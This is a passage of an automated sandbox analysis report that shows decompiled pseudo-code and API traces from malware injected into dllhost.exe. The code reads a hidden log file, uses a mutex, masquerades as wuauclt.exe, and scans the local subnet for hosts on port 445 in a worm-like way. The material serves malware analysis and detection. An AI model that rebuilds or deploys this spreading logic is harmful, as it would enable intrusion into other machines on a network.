                                                0x02864a7e
                                                0x02864a80
                                                0x02864a82
                                                0x02864a87
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02864a87
                                                0x02864a89
                                                0x02864a89
                                                0x02864a8c
                                                0x02864a8f
                                                0x02864aab
                                                0x02864ab9
                                                0x02864a91
                                                0x02864a91
                                                0x02864a9c
                                                0x02864aaa
                                                0x02864aaa
                                                0x02864a41
                                                0x02864a42
                                                0x00000000
                                                0x02864a42
                                                0x02864a3f

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02864AE6,?), ref: 02864A03
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02864A23
                                                • LocalAlloc.KERNEL32(00000040,00000000,?,73B76490), ref: 02864A32
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864A42
                                                • ReadFile.KERNELBASE(00000000,73B76490,00000000,?,00000000,?,73B76490), ref: 02864A71
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864A91
                                                • LocalFree.KERNEL32(73B76490,?,73B76490), ref: 02864A9C
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,73B76490), ref: 02864AAB
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 028649FB
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CloseFile$HandleLocal$AllocChangeCreateFindFreeNotificationReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 4148216468-2357825738
                                                • Opcode ID: ef2b8cdde9934e622c3648c2f32c12ab9e0d86eb23fd15d6f68ea80caabbc914
                                                • Instruction ID: 880d0b188c1bc7a58d4fac96a59d2887ecade32193776c8cdc5a48398d2630c2
                                                • Opcode Fuzzy Hash: ef2b8cdde9934e622c3648c2f32c12ab9e0d86eb23fd15d6f68ea80caabbc914
                                                • Instruction Fuzzy Hash: 9121E57DE40209BBDB208FA9EC89BBEBBB8EB08711F500151F908E7280D7755460CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02869310 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 51synchronizationnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 38%
                                                			E02869310() {
				signed int _v8;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v444;
				void* __esi;
				signed int _t12;
				void* _t16;
				signed int _t18;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				signed int _t33;

				_t35 = (_t33 & 0xfffffff8) - 0x1bc;
				_t12 =  *0x288f008; // 0xe7fe870c
				_v8 = _t12 ^ (_t33 & 0xfffffff8) - 0x000001bc;
				__imp__#115(0x202,  &_v444, _t29); // executed
				asm("movaps xmm0, [0x288cf90]");
				asm("movups [esp+0x1a8], xmm0");
				_v32 = 0x2d383132;
				_v28 = 0x44383732;
				_v24 = 0x7d454536;
				_v20 = 0;
				_t16 = CreateMutexA(0, 1,  &_v48); // executed
				_t30 = _t16;
				_t18 = GetLastError() & 0xffffff00 | _t17 == 0x000000b7;
				if(_t30 == 0) {
					L3:
					_pop(_t31);
					_t10 =  &_v16; // 0x2d383132
					return E02870A5D( *_t10 ^ _t35, _t31);
				} else {
					if(_t18 == 0) {
						_pop(_t32);
						return E02870A5D(_v16 ^ _t35, _t32);
					} else {
						ReleaseMutex(_t30);
						CloseHandle(_t30);
						goto L3;
					}
				}
			}




















                                                0x02869316
                                                0x0286931c
                                                0x02869323
                                                0x02869335
                                                0x0286933b
                                                0x0286934e
                                                0x02869356
                                                0x02869361
                                                0x0286936c
                                                0x02869377
                                                0x0286937f
                                                0x02869385
                                                0x02869392
                                                0x02869397
                                                0x028693ab
                                                0x028693ad
                                                0x028693ae
                                                0x028693bf
                                                0x02869399
                                                0x0286939b
                                                0x028693c9
                                                0x028693d4
                                                0x0286939d
                                                0x0286939e
                                                0x028693a5
                                                0x00000000
                                                0x028693a5
                                                0x0286939b

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02869335
                                                • CreateMutexA.KERNELBASE ref: 0286937F
                                                • GetLastError.KERNEL32 ref: 02869387
                                                • ReleaseMutex.KERNEL32(00000000), ref: 0286939E
                                                • CloseHandle.KERNEL32(00000000), ref: 028693A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastReleaseStartup
                                                • String ID: 218-$278D$6EE}
                                                • API String ID: 2916891069-3960941272
                                                • Opcode ID: b968380d0d7fbd95aae780b79465ccf77950007934a18ad5c613af64edac0e49
                                                • Instruction ID: eae6ecf9f4389810a7178524b06a531a8e3f62120dca9e7ff742420475c99ba6
                                                • Opcode Fuzzy Hash: b968380d0d7fbd95aae780b79465ccf77950007934a18ad5c613af64edac0e49
                                                • Instruction Fuzzy Hash: 0011A0398883448BD6709B28E8497EAB7D8BF86714F84190DE89D8B2C0DB7454558B83
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02866D40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 107sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 84%
                                                			E02866D40() {
				signed int _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v40;
				char _v300;
				char _v560;
				signed int _t18;
				signed char _t29;
				signed int _t30;
				intOrPtr* _t31;
				void* _t35;
				signed char _t47;
				intOrPtr _t51;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr* _t59;
				signed int _t60;
				void* _t61;
				void* _t63;

				_t18 =  *0x288f008; // 0xe7fe870c
				_v8 = _t18 ^ _t60;
				_push(_t56);
				E02873440(_t56,  &_v300, 0, 0x104);
				E02873440(_t56,  &_v560, 0, 0x104);
				GetWindowsDirectoryA( &_v560, 0x104);
				_push("NetworkDistribution");
				E02865180( &_v300, 0x104, "%s\\%s\\",  &_v560);
				_t63 = _t61 + 0x2c;
				_t29 = E02866FE0(1,  &_v300, _t56); // executed
				_t57 = Sleep;
				asm("sbb bl, bl");
				_t47 =  ~_t29 &  ~_t29;
				while(1) {
					asm("xorps xmm0, xmm0");
					_v40 = 0;
					asm("movups [ebp-0x23], xmm0");
					_t59 = 0;
					_v15 = 0;
					asm("movq [ebp-0x13], xmm0");
					_v11 = 0;
					_v9 = 0;
					EnterCriticalSection(0x2896a5c);
					_t30 =  *0x2895ba0;
					if(_t30 != 0) {
						_t49 =  *0x2895b9c;
						_t38 = _t30 - 1;
						_t59 =  *((intOrPtr*)( *0x2895b9c));
						 *0x2895ba0 = _t30 - 1;
						E02871920( *0x2895b9c, _t49 + 4, _t38 << 2);
						_t63 = _t63 + 0xc;
						E02866EF0(0x2895b80);
					}
					L3:
					LeaveCriticalSection(0x2896a5c);
					if(_t59 == 0) {
						Sleep(0x64);
						continue;
						do {
							while(1) {
								asm("xorps xmm0, xmm0");
								_v40 = 0;
								asm("movups [ebp-0x23], xmm0");
								_t59 = 0;
								_v15 = 0;
								asm("movq [ebp-0x13], xmm0");
								_v11 = 0;
								_v9 = 0;
								EnterCriticalSection(0x2896a5c);
								_t30 =  *0x2895ba0;
								if(_t30 != 0) {
									_t49 =  *0x2895b9c;
									_t38 = _t30 - 1;
									_t59 =  *((intOrPtr*)( *0x2895b9c));
									 *0x2895ba0 = _t30 - 1;
									E02871920( *0x2895b9c, _t49 + 4, _t38 << 2);
									_t63 = _t63 + 0xc;
									E02866EF0(0x2895b80);
								}
								goto L3;
							}
							L9:
							_t35 = E02867720(_t47,  &_v40,  &_v300, _t57, _t59, _t70);
							_t71 = _t35;
						} while (_t35 != 0);
						L10:
						if(E0286B070( &_v40, _t71) == 0) {
							Sleep(0xa);
						}
						continue;
					}
					_t31 = _t59;
					_t13 = _t31 + 1; // 0x1
					_t54 = _t13;
					do {
						_t51 =  *_t31;
						_t31 = _t31 + 1;
					} while (_t51 != 0);
					if(_t31 - _t54 > 4) {
						E02875C70( &_v40, 0x20, _t59);
						_t63 = _t63 + 0xc;
					}
					_push(0x2c);
					E02870AA1(_t59);
					_t63 = _t63 + 8;
					_t70 = _t47;
					if(_t47 == 0) {
						goto L10;
					} else {
						goto L9;
					}
				}
			}
























                                                0x02866d49
                                                0x02866d50
                                                0x02866d55
                                                0x02866d66
                                                0x02866d79
                                                0x02866d8d
                                                0x02866d93
                                                0x02866db0
                                                0x02866db5
                                                0x02866dbe
                                                0x02866dc3
                                                0x02866dcd
                                                0x02866dcf
                                                0x02866dd1
                                                0x02866dd1
                                                0x02866dd4
                                                0x02866ddd
                                                0x02866de1
                                                0x02866de3
                                                0x02866dea
                                                0x02866def
                                                0x02866df5
                                                0x02866df9
                                                0x02866dff
                                                0x02866e06
                                                0x02866e08
                                                0x02866e0e
                                                0x02866e0f
                                                0x02866e11
                                                0x02866e1f
                                                0x02866e24
                                                0x02866e2c
                                                0x02866e2c
                                                0x02866e31
                                                0x02866e36
                                                0x02866e3e
                                                0x02866ea2
                                                0x02866ea4
                                                0x02866dd1
                                                0x02866dd1
                                                0x02866dd1
                                                0x02866dd4
                                                0x02866ddd
                                                0x02866de1
                                                0x02866de3
                                                0x02866dea
                                                0x02866def
                                                0x02866df5
                                                0x02866df9
                                                0x02866dff
                                                0x02866e06
                                                0x02866e08
                                                0x02866e0e
                                                0x02866e0f
                                                0x02866e11
                                                0x02866e1f
                                                0x02866e24
                                                0x02866e2c
                                                0x02866e2c
                                                0x00000000
                                                0x02866e06
                                                0x02866e71
                                                0x02866e7a
                                                0x02866e7f
                                                0x02866e7f
                                                0x02866e87
                                                0x02866e91
                                                0x02866e99
                                                0x02866e99
                                                0x00000000
                                                0x02866e91
                                                0x02866e40
                                                0x02866e42
                                                0x02866e42
                                                0x02866e45
                                                0x02866e45
                                                0x02866e47
                                                0x02866e48
                                                0x02866e51
                                                0x02866e5a
                                                0x02866e5f
                                                0x02866e5f
                                                0x02866e62
                                                0x02866e65
                                                0x02866e6a
                                                0x02866e6d
                                                0x02866e6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02866e6f

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02866D8D
                                                  • Part of subcall function 02866FE0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0286703C
                                                  • Part of subcall function 02866FE0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0286704C
                                                  • Part of subcall function 02866FE0: CreateDirectoryA.KERNELBASE(?,00000000), ref: 02867055
                                                  • Part of subcall function 02866FE0: DeleteFileA.KERNEL32(?), ref: 02867093
                                                • EnterCriticalSection.KERNEL32(02896A5C), ref: 02866DF9
                                                • LeaveCriticalSection.KERNEL32(02896A5C), ref: 02866E36
                                                • Sleep.KERNEL32(0000000A), ref: 02866E99
                                                • Sleep.KERNEL32(00000064), ref: 02866EA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CreateCriticalDirectoryFileSectionSleep$ChangeCloseDeleteEnterFindLeaveNotificationWindows
                                                • String ID: %s\%s\$NetworkDistribution
                                                • API String ID: 2690460970-574155335
                                                • Opcode ID: f0c0874ea5d0b9ecf0ad19d48156f5414744a540b3e7befea6733c9b24b13ed3
                                                • Instruction ID: a3c6c1b86b763715f5e57df7b2bfab1f3b76ff7bbe81ea7dac173d2f0a850419
                                                • Opcode Fuzzy Hash: f0c0874ea5d0b9ecf0ad19d48156f5414744a540b3e7befea6733c9b24b13ed3
                                                • Instruction Fuzzy Hash: DB31097DD40228ABEB10EBB4DC49FEE73A99F04704F944054E504F7180FB79E6588BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02864AC0 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 81%
                                                			E02864AC0(void* __ecx, intOrPtr __edx, void** _a4, long* _a8) {
				void* _v8;
				long _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				void* _t44;
				long _t51;
				long _t61;
				long _t62;
				long _t66;
				void* _t78;
				void* _t79;
				long* _t80;
				long _t87;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t93;

				_v24 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t44 = E028649E0( &_v8,  &_v12); // executed
				_t93 = _t92 + 4;
				if(_t44 != 0) {
					_t87 = _v12;
					_t78 = 0;
					_v16 = 0;
					__eflags = _t87;
					if(__eflags <= 0) {
						L10:
						LocalFree(_v8); // executed
						return _v16;
					} else {
						while(1) {
							_t90 = E02870A6E(_t90, __eflags, 0x58);
							_v20 = _t90;
							_v20 = _t90;
							E02873440(_t87, _t90, 0, 0x58);
							_t93 = _t93 + 0x10;
							asm("movups xmm0, [ebx+eax]");
							asm("movups [esi], xmm0");
							asm("movups xmm0, [ebx+eax+0x10]");
							asm("movups [esi+0x10], xmm0");
							asm("movups xmm0, [ebx+eax+0x20]");
							asm("movups [esi+0x20], xmm0");
							asm("movups xmm0, [ebx+eax+0x30]");
							asm("movups [esi+0x30], xmm0");
							asm("movups xmm0, [ebx+eax+0x40]");
							_t79 = _t78 + 0x50;
							asm("movups [esi+0x40], xmm0");
							__eflags =  *_t90 - _v24;
							if( *_t90 == _v24) {
								break;
							}
							_t78 = _t79 +  *(_t90 + 0x38) +  *(_t90 + 0xc);
							__eflags = _t78 - _t87;
							if(__eflags < 0) {
								continue;
							} else {
								LocalFree(_v8);
								return _v16;
							}
							goto L11;
						}
						_t51 =  *(_t90 + 0xc);
						_v12 = _t51;
						 *((intOrPtr*)(_t90 + 0x50)) = LocalAlloc(0x40, _t51);
						 *((intOrPtr*)(_t90 + 0x54)) = LocalAlloc(0x40,  *(_t90 + 0x38));
						E02883DB0( *((intOrPtr*)(_t90 + 0x50)), _v8 + _t79, _v12);
						E02883DB0( *((intOrPtr*)(_t90 + 0x54)), _v12 + _t79 + _v8,  *(_t90 + 0x38));
						_t61 = E028648B0( &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							goto L10;
						} else {
							_t89 = _v20;
							_t80 = _a8;
							_t62 =  *(_t89 + 8);
							 *_t80 = _t62;
							 *_a4 = LocalAlloc(0x40, _t62);
							E02873440(_t89, _t63, 0,  *(_t89 + 8));
							_t66 = E02861000(_t63, _t80,  *((intOrPtr*)(_t89 + 0x50)), _v12);
							__eflags = _t66;
							if(_t66 == 0) {
								__eflags =  *_t80 -  *(_t89 + 8);
								_t69 =  ==  ? 1 : _v16 & 0x000000ff;
								_v16 =  ==  ? 1 : _v16 & 0x000000ff;
								goto L10;
							} else {
								LocalFree( *_a4);
								LocalFree(_v8);
								return _v16;
							}
						}
					}
				} else {
					return _t44;
				}
				L11:
			}























                                                0x02864acb
                                                0x02864ad3
                                                0x02864ada
                                                0x02864ae1
                                                0x02864ae6
                                                0x02864aeb
                                                0x02864af4
                                                0x02864af7
                                                0x02864af9
                                                0x02864afd
                                                0x02864aff
                                                0x02864c42
                                                0x02864c45
                                                0x02864c54
                                                0x02864b05
                                                0x02864b05
                                                0x02864b0f
                                                0x02864b11
                                                0x02864b14
                                                0x02864b1c
                                                0x02864b24
                                                0x02864b27
                                                0x02864b2b
                                                0x02864b2e
                                                0x02864b33
                                                0x02864b37
                                                0x02864b3c
                                                0x02864b40
                                                0x02864b45
                                                0x02864b49
                                                0x02864b51
                                                0x02864b54
                                                0x02864b58
                                                0x02864b5a
                                                0x00000000
                                                0x00000000
                                                0x02864b62
                                                0x02864b64
                                                0x02864b66
                                                0x00000000
                                                0x02864b68
                                                0x02864b6b
                                                0x02864b7a
                                                0x02864b7a
                                                0x00000000
                                                0x02864b66
                                                0x02864b7b
                                                0x02864b84
                                                0x02864b90
                                                0x02864b9c
                                                0x02864ba8
                                                0x02864bbd
                                                0x02864bc8
                                                0x02864bcd
                                                0x02864bcf
                                                0x00000000
                                                0x02864bd1
                                                0x02864bd1
                                                0x02864bd4
                                                0x02864bd7
                                                0x02864bdd
                                                0x02864bf0
                                                0x02864bf2
                                                0x02864c02
                                                0x02864c0a
                                                0x02864c0c
                                                0x02864c36
                                                0x02864c3c
                                                0x02864c3f
                                                0x00000000
                                                0x02864c0e
                                                0x02864c13
                                                0x02864c1c
                                                0x02864c2b
                                                0x02864c2b
                                                0x02864c0c
                                                0x02864bcf
                                                0x02864af3
                                                0x02864af3
                                                0x02864af3
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 028649E0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02864AE6,?), ref: 02864A03
                                                  • Part of subcall function 028649E0: GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02864A23
                                                  • Part of subcall function 028649E0: LocalAlloc.KERNEL32(00000040,00000000,?,73B76490), ref: 02864A32
                                                  • Part of subcall function 028649E0: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864A42
                                                • new.LIBCMT ref: 02864B07
                                                • LocalFree.KERNEL32(00000000), ref: 02864B6B
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID:
                                                • API String ID: 1503672127-0
                                                • Opcode ID: 27341c200c0cc0c56c6664673a43fa5d00404507d7a9e7f850dab0e977b2307c
                                                • Instruction ID: 82aed80ed5a6a60acfdfa4670bd5ed85e51518ddaf2634f9c6f36b088fdc45f3
                                                • Opcode Fuzzy Hash: 27341c200c0cc0c56c6664673a43fa5d00404507d7a9e7f850dab0e977b2307c
                                                • Instruction Fuzzy Hash: F151C579D00704ABDB11DFA8DD45ABEFBB0FF48318F044594EE48A6201E731AA94CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286AFC0 Relevance: 12.1, APIs: 8, Instructions: 54sleepthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E0286AFC0() {
				void* __edi;
				void* _t7;
				void* _t9;
				signed int _t14;
				signed int _t15;
				void* _t18;
				void* _t19;

				Sleep(0xbb8); // executed
				_t7 = 0;
				do {
					_t1 = _t7 + L"wuauclt.exe"; // 0x750077
					_t14 =  *_t1 & 0x0000ffff;
					_t7 = _t7 + 2;
					 *(_t7 + 0x2896836) = _t14;
					_t22 = _t14;
				} while (_t14 != 0);
				E02869D90(_t22);
				_t9 = E0286AE20(_t14, _t18, _t22);
				if(_t9 != 0) {
					while(1) {
						L4:
						EnterCriticalSection(0x2895bfc);
						_t15 =  *0x2895c18;
						if(_t15 == 0) {
							break;
						}
						_t19 =  *( *0x2895c14 + _t15 * 4 - 4);
						 *0x2895c18 = _t15 - 1;
						E02866EF0(0x2895bf8);
						if(_t19 != 0) {
							CreateThread(0, 0, E0286AD60, _t19, 0, 0);
						}
						LeaveCriticalSection(0x2895bfc);
						Sleep(0x64);
					}
					LeaveCriticalSection(0x2895bfc);
					Sleep(0xbb8);
					Sleep(0x64);
					goto L4;
				}
				return _t9;
			}










                                                0x0286afce
                                                0x0286afd0
                                                0x0286afd2
                                                0x0286afd2
                                                0x0286afd2
                                                0x0286afd9
                                                0x0286afdc
                                                0x0286afe3
                                                0x0286afe3
                                                0x0286afe8
                                                0x0286afed
                                                0x0286aff4
                                                0x0286b000
                                                0x0286b000
                                                0x0286b005
                                                0x0286b00b
                                                0x0286b013
                                                0x00000000
                                                0x00000000
                                                0x0286b01a
                                                0x0286b01f
                                                0x0286b02a
                                                0x0286b031
                                                0x0286b041
                                                0x0286b041
                                                0x0286b04c
                                                0x0286b050
                                                0x0286b050
                                                0x0286b059
                                                0x0286b060
                                                0x0286b064
                                                0x00000000
                                                0x0286b064
                                                0x0286b06b

                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 0286AFCE
                                                • EnterCriticalSection.KERNEL32(02895BFC), ref: 0286B005
                                                • CreateThread.KERNEL32(00000000,00000000,0286AD60,?,00000000,00000000), ref: 0286B041
                                                • LeaveCriticalSection.KERNEL32(02895BFC), ref: 0286B04C
                                                • Sleep.KERNEL32(00000064), ref: 0286B050
                                                • LeaveCriticalSection.KERNEL32(02895BFC), ref: 0286B059
                                                • Sleep.KERNEL32(00000BB8), ref: 0286B060
                                                • Sleep.KERNEL32(00000064), ref: 0286B064
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Sleep$CriticalSection$Leave$CreateEnterThread
                                                • String ID:
                                                • API String ID: 2546236395-0
                                                • Opcode ID: f221ac4b18ecfefcd276b8863a5e5746e4a4880e1c328cd4ad4a66c0a46d139e
                                                • Instruction ID: ac787bad1f0e5d839649b4a040233055a375998faa5c50ae026e81f51d10864c
                                                • Opcode Fuzzy Hash: f221ac4b18ecfefcd276b8863a5e5746e4a4880e1c328cd4ad4a66c0a46d139e
                                                • Instruction Fuzzy Hash: 9701043C7843089AE625BB989C49F3D3B54EB44B0CF490409F605EB2C0DBA86450CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286B320 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0286B33A
                                                • inet_addr.WS2_32(?), ref: 0286B351
                                                • htons.WS2_32(000001BD), ref: 0286B35F
                                                • connect.WS2_32(00000000,?,00000010), ref: 0286B370
                                                • closesocket.WS2_32(00000000), ref: 0286B37C
                                                • closesocket.WS2_32(00000000), ref: 0286B394
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: 76da96c623afc5241ccc67a54dfd4fcfae4f1dfef68c265d95f27bf091a86baa
                                                • Instruction ID: 650a5b40babc126de341600c2faa0cd2850f21f76f10557095f0b6170f483178
                                                • Opcode Fuzzy Hash: 76da96c623afc5241ccc67a54dfd4fcfae4f1dfef68c265d95f27bf091a86baa
                                                • Instruction Fuzzy Hash: 9411083CA402089BCB10AFBCAD09AFEB3B5FF45324F500655E825EB2C0DF7449118792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286B290 Relevance: 9.1, APIs: 6, Instructions: 56networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0286B2AD
                                                • inet_addr.WS2_32(?), ref: 0286B2C4
                                                • htons.WS2_32(0000DEFC), ref: 0286B2CE
                                                • connect.WS2_32(00000000,?,00000010), ref: 0286B2DF
                                                • closesocket.WS2_32(00000000), ref: 0286B2EB
                                                • closesocket.WS2_32(00000000), ref: 0286B304
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: closesocket$connecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 279130052-0
                                                • Opcode ID: a60456602036ed54590321619ead190a336b42601ce89ff64929369c1705a3c8
                                                • Instruction ID: b5acbda7ced4019fce8e10979a2dcfad3bd6ba406cb4c2d36639b657fac2cea3
                                                • Opcode Fuzzy Hash: a60456602036ed54590321619ead190a336b42601ce89ff64929369c1705a3c8
                                                • Instruction Fuzzy Hash: AF01C83DA41108ABCB10ABBCAC49AEEB7B8FF49321F510659E925D72C0DB3549148791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02867C20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121sleepnetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 483 2867c20-2867c4d 484 2867c53-2867c8c call 2873440 gethostname gethostbyname 483->484 487 2867c97-2867cb4 484->487 488 2867c8e-2867c95 Sleep 484->488 489 2867ddf-2867de6 Sleep 487->489 490 2867cba-2867cbc 487->490 488->484 489->484 491 2867cc0-2867d16 call 2865180 490->491 494 2867d1c-2867d1f 491->494 495 2867d18-2867d1a 491->495 497 2867d22-2867d27 494->497 496 2867d2b-2867d64 call 2865a00 call 2867df0 495->496 503 2867d66-2867d6e call 2865cf0 496->503 504 2867d73-2867dac call 286b4e0 496->504 497->497 498 2867d29 497->498 498->496 503->504 508 2867dae-2867dd3 504->508 509 2867dd9 504->509 508->491 508->509 509->489
                                                C-Code - Quality: 63%
                                                			E02867C20() {
				char _v8;
				char _v16;
				signed int _v20;
				char _v21;
				short _v23;
				char _v27;
				char _v52;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v332;
				signed int _v336;
				signed int _t43;
				signed int _t44;
				intOrPtr* _t50;
				signed char* _t52;
				signed int _t53;
				intOrPtr* _t56;
				void* _t57;
				intOrPtr* _t61;
				signed int _t67;
				signed char* _t68;
				void* _t71;
				intOrPtr _t73;
				signed char** _t77;
				signed int _t78;
				void* _t81;
				signed int _t82;
				intOrPtr* _t84;
				signed int _t85;
				void* _t86;
				void* _t87;
				void* _t88;

				_push(0xffffffff);
				_push(E0288467B);
				_push( *[fs:0x0]);
				_t87 = _t86 - 0x140;
				_t43 =  *0x288f008; // 0xe7fe870c
				_t44 = _t43 ^ _t85;
				_v20 = _t44;
				_push(_t44);
				 *[fs:0x0] =  &_v16;
				_t81 = Sleep;
				while(1) {
					L1:
					E02873440(_t81,  &_v308, 0, 0x100);
					_t87 = _t87 + 0xc;
					gethostname( &_v308, 0x100); // executed
					_t50 =  &_v308;
					__imp__#52(_t50); // executed
					_t84 = _t50;
					if(_t84 == 0) {
						break;
					}
					_v336 = 0;
					_t52 =  *( *(_t84 + 0xc));
					_t72 =  *_t52 & 0x000000ff;
					_t78 = _t52[1] & 0x000000ff;
					_t53 = _t52[2] & 0x000000ff;
					if(( *_t52 & 0x000000ff) == 0x7f) {
						L15:
						Sleep(0xdbba0); // executed
						continue;
					}
					_t82 = 0;
					do {
						_push(_t53);
						_push(_t78);
						asm("xorps xmm0, xmm0");
						_v52 = 0;
						asm("movq [ebp-0x1f], xmm0");
						asm("movups [ebp-0x2f], xmm0");
						_v27 = 0;
						_v23 = 0;
						_v21 = 0;
						E02865180( &_v52, 0x20, "%d.%d.%d.*", _t72);
						_t88 = _t87 + 0x18;
						_v312 = 0xf;
						_v316 = 0;
						_v332 = 0;
						if(_v52 != 0) {
							_t56 =  &_v52;
							_t20 = _t56 + 1; // 0x1
							_t78 = _t20;
							do {
								_t73 =  *_t56;
								_t56 = _t56 + 1;
							} while (_t73 != 0);
							_t57 = _t56 - _t78;
							L10:
							_push(_t57);
							_push( &_v52);
							E02865A00(_t71,  &_v332, _t82, _t84);
							_v8 = 0;
							_t61 = E02867DF0( &_v332,  &_v332);
							_v8 = 0xffffffff;
							 *_t61 = 0;
							_t62 = _v312;
							if(_v312 >= 0x10) {
								E02865CF0(_t71, _t78, _t82, _v332, _t62 + 1);
							}
							_v312 = 0xf;
							_v316 = 0;
							_v332 = 0;
							E0286B4E0(_t71,  *((intOrPtr*)( *(_t84 + 0xc) + _t82)), 1, _t82, 0);
							_t77 =  *(_t84 + 0xc);
							_t87 = _t88 + 4;
							if( *((short*)(_t84 + 0xa)) +  *(_t77 + _t82) >=  *_t84) {
								break;
							} else {
								goto L13;
							}
						}
						_t57 = 0;
						goto L10;
						L13:
						_t67 = _v336 + 1;
						_v336 = _t67;
						_t82 = _t67 * 4;
						_t68 =  *(_t77 + _t82);
						_t72 =  *_t68 & 0x000000ff;
						_t78 = _t68[1] & 0x000000ff;
						_t53 = _t68[2] & 0x000000ff;
					} while (( *_t68 & 0x000000ff) != 0x7f);
					_t81 = Sleep;
					goto L15;
				}
				Sleep(0x2bf20);
				goto L1;
			}




































                                                0x02867c23
                                                0x02867c25
                                                0x02867c30
                                                0x02867c31
                                                0x02867c37
                                                0x02867c3c
                                                0x02867c3e
                                                0x02867c43
                                                0x02867c47
                                                0x02867c4d
                                                0x02867c53
                                                0x02867c53
                                                0x02867c61
                                                0x02867c66
                                                0x02867c75
                                                0x02867c7b
                                                0x02867c82
                                                0x02867c88
                                                0x02867c8c
